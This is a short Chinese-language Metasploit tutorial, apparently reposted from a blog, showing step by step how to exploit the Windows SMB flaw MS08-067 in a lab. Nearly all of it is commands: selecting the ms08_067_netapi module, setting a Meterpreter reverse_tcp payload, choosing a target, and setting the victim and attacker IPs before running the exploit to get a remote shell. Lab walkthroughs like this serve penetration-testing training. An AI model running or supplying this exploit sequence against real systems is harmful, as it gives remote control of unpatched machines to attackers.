kali-matasploit


1、进入msf终端后,使用search功能搜索ms08-067,发现有一个可用模块:

>msf > search ms08-067

2、使用use命令选定要利用的模块:
msf > use exploit/windows/smb/ms08_067_netapi

3、设置攻击载荷为基于Windows系统的Meterpreter reverse_tcp 

 set PAYLOAD windows/meterpreter/reverse_tcp

4、使用“show targets”命令让我们识别和匹配目标操作系统的类型。

msf exploit(ms08_067_netapi) > show targets 

E
5、选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST)

msf exploit(ms08_067_netapi) > set TARGET 17
TARGET => 17
msf exploit(ms08_067_netapi) > set RHOST 192.168.116.129
RHOST => 192.168.116.129
msf exploit(ms08_067_netapi) > set LHOST 192.168.116.128
LHOST => 192.168.116.128

6、使用“show options”命令查看当前参数设置情况:
msf exploit(ms08_067_netapi) >  show option

 7、参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
msf exploit(ms08_067_netapi) > run
原文地址:https://www.cnblogs.com/enddark/p/12973933.html